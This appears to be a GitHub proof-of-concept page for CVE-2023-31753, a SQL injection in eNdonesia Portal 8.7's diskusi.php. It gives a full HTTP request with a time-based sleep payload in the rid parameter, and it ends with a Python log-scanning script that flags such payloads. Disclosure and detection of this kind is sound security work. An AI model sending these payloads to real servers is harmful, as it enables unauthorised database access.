CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

SQL injection vulnerability in diskusi.php in eNdonesia 8.7 allows an attacker to execute arbitrary SQL commands via the “rid=” parameter.

Proof of Concept for CVE-2023-31753

Description: A SQL injection vulnerability was discovered in eNdonesia Portal v8.7. It can be exploited by inserting a crafted payload into the “rid” parameter in diskusi.php.

  • Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
  • Date: May 19, 2023
  • Exploit Author: Kunal Khubchandani
  • Vendor Homepage: http://www.endonesia.org/
  • Software Link: https://sourceforge.net/projects/endonesia/
  • Version: 8.7
  • Category: Webapps
  • Tested on: WiN11_x64/KaLiLinuX_x64
  • CVE: CVE-2023-31753

#POC:

  1. To exploit this vulnerability, one must send a SQLi sleep payload as the value of the “rid” GET parameter in the following HTTP request.

  2. Vulnerable Request:

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1
Host: TARGET
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Connection: close
Cache-Control: max-age=0

  3. Upon sending the above HTTP request through Burp Suite, the user will receive a response with a 20-second delay.

[Screenshot: 20 Seconds Delay]

[Screenshot: 30 Seconds Delay]
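One way to hunt for this request pattern in web server access logs, as an added example that is not part of the original advisory or PoC repository: it flags requests to the diskusi module whose decoded rid value is not a plain integer. The log lines are constructed, and treating a legitimate rid as always a decimal id is an assumption the page does not state.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [19/May/2023:10:01:12 +0000] "GET /endonesia.8.7.en/mod.php?mod=diskusi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [19/May/2023:10:01:40 +0000] "GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=12 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [19/May/2023:10:02:03 +0000] "GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [19/May/2023:10:02:31 +0000] "GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=12%20OR%201%3D1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [19/May/2023:10:03:02 +0000] "GET /endonesia.8.7.en/mod.php?mod=example&rid=abc HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_rid_requests(log_text):
    """Return (client_ip, decoded_rid) for diskusi requests whose rid is not an integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/mod.php"):
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared in clear form.
        params = parse_qs(url.query, keep_blank_values=True)
        if "diskusi" not in params.get("mod", []):
            continue
        for rid in params.get("rid", []):
            # Assumption: a legitimate rid is a plain decimal id.
            if not re.fullmatch(r"[0-9]+", rid):
                hits.append((line.split()[0], rid))
    return hits


if __name__ == "__main__":
    for ip, rid in suspicious_rid_requests(SAMPLE_LOG):
        print(f"{ip}\tnon-numeric rid: {rid!r}")
```

The check only sees GET query strings that reach the access log; values sent in a request body need the same test applied at a WAF or in the application itself.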
